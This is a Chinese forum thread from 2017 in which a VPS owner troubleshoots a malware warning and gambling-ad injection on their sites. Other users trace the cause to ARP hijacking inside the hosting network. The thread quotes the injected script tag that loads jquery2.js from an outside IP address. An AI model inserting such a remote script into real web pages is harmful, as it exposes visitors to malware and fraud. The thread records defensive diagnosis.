遇到一个棘手的问题，服务器被注入恶意软件了，求助。

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

已注册用户请登录

这是一个创建于 2650 天前的主题，其中的信息可能已经有所发展或是发生改变。

自己在 VPS 上面搭建本人的一两个小站，今天早上访问的时候突然弹出恶意软件的提示：

chrome 访问时的红色警告：
----------------------------------------------------
您要访问的网站包含恶意软件

攻击者可能会试图通过 60.210.98.240 在您的计算机上安装危险程序，以窃取或删除您的信息（如照片、密码、通讯内容和信用卡信息）。
自动向 Google 报告可能出现的安全事件的详细信息。隐私权政策
----------------------------------------------------
其他浏览器也是，点继续访问，文章旁边就显示各种菠菜网站，还有直接跳转到菠菜网站的地址。

网站都没怎么公开过，基本上都是个人在使用。
测试情况：
第一个网站：主页不会，然后点进去的文章，大部分都会提示这个警告，然后有个别文章又不会。
第二个网站：主页和其他链接都直接提示。
本地代码连远程数据库访问正常。
两个网站的代码都很干净。
----------------------------------------------------
近期对服务器的操作，除了用一键脚本安装 kcptun （很多天前的，服务也已经停止，都没启用），也没啥异常操作。

服务器现在都能正常登录操作。用 last 也没看出什么异常 ip 。
有人遇到过这种情况么，具体要怎么排查问题？
紧急求助，谢谢大家！

访问

网站

恶意

服务器

32 条回复 • 2017-01-15 14:51:28 +08:00

claysec

2017-01-14 12:45:07 +08:00 via Android

被人做了 seo 呗，先检查服务器有没有问题，没有的话去谷歌那边申诉下咯

2017-01-14 12:57:58 +08:00

@claysec seo 不大可能吧，我两个站每天的 ip 访问量就我一个，像是内部因素引起的。

zk8802

2017-01-14 14:38:20 +08:00

@ob 楼主留个邮箱，我私下联系你。

Famio

2017-01-14 14:42:31 +08:00

养成良好维护习惯。例如我，定期做快照，出问题解决不了直接回滚。爽啊~~~
另外，网站附上啊

2017-01-14 15:33:50 +08:00

@zk8802 http://i1.buimg.com/517485/282a45fcbd2fda6f.png

2017-01-14 15:42:09 +08:00

@Famio
aHR0cDovL3Rvb2xzLm9icm9vbS5jb20v
私人用网站，就不直接公开，想看被感染的效果用 base64 转下。
点确点会跳到菠菜网站，点取消，会直接在主页旁边显示广告出来。

@zk8802

2017-01-14 15:48:08 +08:00

@zk8802
@Famio

在顶部直接被插入了一行：
<script src=http://60.210.98.240:280/jquery2.js></script>

确认过，在代码里面是没有的，不知道怎么做到的，域名采用 dnspod.cn 解析.

artandlol

2017-01-14 16:13:24 +08:00 via Android

@ob 页面贴下
看大家是否一样
如果都类似说明你的站被黑了

cos

2017-01-14 16:21:41 +08:00

首先还是排除一下你本地的系统是否干净吧，比如搞张 linux livecd 启动后再浏览你的网站看看，再就是路由器，再就是 ISP 的 http 劫持，一个个都排除了，那就是服务器的问题了，另外，有些虚拟主机服务商也会给网站插广告代码的。。。

2017-01-14 16:45:52 +08:00

@artandlol
aHR0cDovL3Rvb2xzLm9icm9vbS5jb20v
用 base64 转下能看到。

2017-01-14 16:48:37 +08:00

@cos 手机浏览器上面访问都出问题，然后在 pc 上面一样的情况。排除 ISP 的 http 劫持。
我买的这个好几年了，正常应该是不会，后面找不到问题，我提个工单问一下。
再不行，得重装系统了，要弄一大堆东西，比较麻烦。
目前不知道怎么排查这个问题。

zk8802

2017-01-14 16:56:35 +08:00

@ob 我没有微信，用邮件联系吧。我可以帮你排查一下问题。

2017-01-14 17:05:04 +08:00

@zk8802
![Markdown]( http://p1.bpimg.com/517485/87c8d88491cbde02.jpg)
麻烦你了。

zk8802

2017-01-14 17:14:03 +08:00

@ob 你先把网站下线吧，我已经找到漏洞了。

2017-01-14 17:16:14 +08:00

@zk8802 好的

2017-01-14 17:16:35 +08:00

@zk8802 已停止

zk8802

2017-01-14 17:17:41 +08:00

@ob 已发邮件，请查收。

zk8802

2017-01-14 18:49:28 +08:00

经过排查，发现不是服务器的问题，而是服务器那边 ISP 劫持了所有 HTTP/1.{0,1} 200 的内容，在页面开头插入了恶意脚本。

最明显的证据是同 C 段主机的内容也被劫持了，比如 curl -v http://118.193.216.206 ，会发现这个页面的开头也有劫持代码。

最后非常感谢 @ob 的配合，因为相信互联网上的陌生人是需要极大勇气的。

vimffs

2017-01-14 18:58:09 +08:00

我看到和 7 楼的一样。

cyr1l

2017-01-14 19:07:01 +08:00 via iPhone

ISP 劫持网页放博彩网站的广告，这胆子也太大了，有点猖狂了吧。

Yien

2017-01-14 19:50:04 +08:00 via iPhone

@zk8802 讚

cos

2017-01-14 20:00:07 +08:00

@cyr1l 那有什么奇怪的，以前那个 W 宿，听说有个部门专门接流量导流的生意。。。。

claysec

2017-01-14 20:01:45 +08:00 via Android

@ob 那就是运营商那边劫持了。不用说了

cyr1l

2017-01-14 20:15:06 +08:00 via iPhone

@cos 接推广链接的见过，还没见过接博彩网站的。

freestyle

2017-01-14 20:58:30 +08:00

上 https 看下不出现了说明有劫持

2017-01-14 21:02:07 +08:00

@vimffs
@Yien
@cos
@claysec
@cyr1l
@zk8802
谢谢各位，特别感谢 zk8802 的无私和专业的帮助。
问题如 zk8802 所定位的一样，确实是 ISP 被劫持。
已经提交工单，主机提供商已经处理完毕。
一开始他们只回复已处理，连个解释都没有，后面让技术客服解释具体原因说是：
“内网有人执行 ARP 劫持，疑似被黑，已经 Kill 。”
没有担责和抱歉的意思。

出现这种情况让我觉得，要是很多没去仔细分析网站细节的人，如果偷偷的被劫持一些小的广告或者其他很难被发现的的东西，是不是默默的承受这种劫持？
主要是这次的劫持太过猖狂和明显，要不然，我估计也发现不到。

kwx

2017-01-14 21:43:34 +08:00

@ob vps 环境时不时会因为有客户主机被黑导致 ARP ，安装 arp 防火墙就可以解决，或强制绑定 VPS 母鸡的 MAC 地址。

2017-01-14 22:03:43 +08:00

@kwx 用的就是你们家的 vps 哦。折腾了半天。

artandlol

2017-01-14 22:26:36 +08:00 via Android

然而你间接暴露了他的 ip 一大波 100G 的流量正在路上

2017-01-14 22:29:53 +08:00

@artandlol 哈哈，我的站说是还有些漏洞，这样就很尴尬了。

caomu

2017-01-14 22:44:34 +08:00 via Android

这就尴尬了。。。

claysec

2017-01-15 14:51:28 +08:00 via Android

@ob 这运营商。内网还能 arp